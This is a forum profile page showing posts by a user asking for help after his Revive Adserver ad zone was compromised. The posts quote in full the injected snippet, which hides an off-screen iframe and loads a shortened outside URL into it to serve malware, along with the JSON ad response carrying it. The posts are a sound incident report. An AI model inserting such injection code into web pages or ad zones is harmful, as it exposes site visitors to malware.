Jump to content


Approved members
  • Content Count

  • Joined

  • Last visited

About Stefan

  • Rank

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Stefan

    revive Asynchronous JS hacked

    Thank you. So according to is removing that line of code the solution? Strange thing is, that every file is from the feburary 2018 (when I did the update). So if a file get modified then must changed the timestamp too?
  2. Stefan

    revive Asynchronous JS hacked

    Google AdWords has reported that malware/unwanted content is being distributed on our website. It's created with JavaScript which is hidden (along with the CSS that hides the iframe) in the HTML for the the skyscraper ad on the right; that HTML is itself embedded in JSON that's loaded asynchronously. The offending code is just: Code: <style> #ifr_ads_banners{ width:1600px;height:800px;position:absolute;left:-9985px; } </style> <script> (function(d,e,g){ g=d.createElement(e); g.src='//goo.gl/Cp8ciT'; g.id='ifr_ads_banners'; d.body.appendChild(g); })(document,'iframe'); </script> If you follow that goo.gl URL, it takes you to the bags site, and all subsequent badness comes from garbage that is itself embedded in there. I found out that it is Revive's fault, because probably via Asynchronous JS the following code was inserted in the field "Always prepend the following HTML code to banners displayed by this zone". It's in the output from "www/delivery/asyncspc.php" which is JSON fetched asynchronously (via XMLHttpRequest) and returns: { "revive-0-0": { "html": "<a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=35dbefdc15__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cleaderboard' target='_blank'><img src='https://rev.contractoruk.com/www/images/6461024dbdede6b423ea67fe31f9eacb.gif' width='728' height='90' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_35dbefdc15' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=3&amp;campaignid=2&amp;zoneid=1&amp;loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&amp;referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&amp;cb=35dbefdc15' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>", "width": "728", "height": "90", "iframeFriendly": false }, "revive-0-1": { "html": "<style>#ifr_ads_banners{width:1600px;height:800px;position:absolute;left:-9985px;}</style><script>(function(d,e,g){g=d.createElement(e);g.src='//goo.gl/Cp8ciT';g.id='ifr_ads_banners';d.body.appendChild(g);})(document,'iframe');</script><a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=4__zoneid=2__cb=e21e133ee8__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cskyscraper' target='_blank'><img src='https://rev.contractoruk.com/www/images/7cb73f87f1f449519d2e2b8832fbd2ae.gif' width='160' height='600' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_e21e133ee8' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=4&amp;campaignid=2&amp;zoneid=2&amp;loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&amp;referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&amp;cb=e21e133ee8' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>", "width": "160", "height": "600", "iframeFriendly": false } } I could fix that by removing the checkbox "Prepend/Append even if no banner delivered" and the code in that field. But I have no idea how that could happend. Because the passwords are save. And if the hacker had hacked the password, they would change more than only this not? I'm using Revive Adserver v4.1.3 and I've already seen if an update to 4.1.4 would help. But there are no security updates in the release notes https://github.com/revive-adserver/revive-adserver/blob/v4.1.4/RELEASE_NOTES.txt. Thank you for any inputs.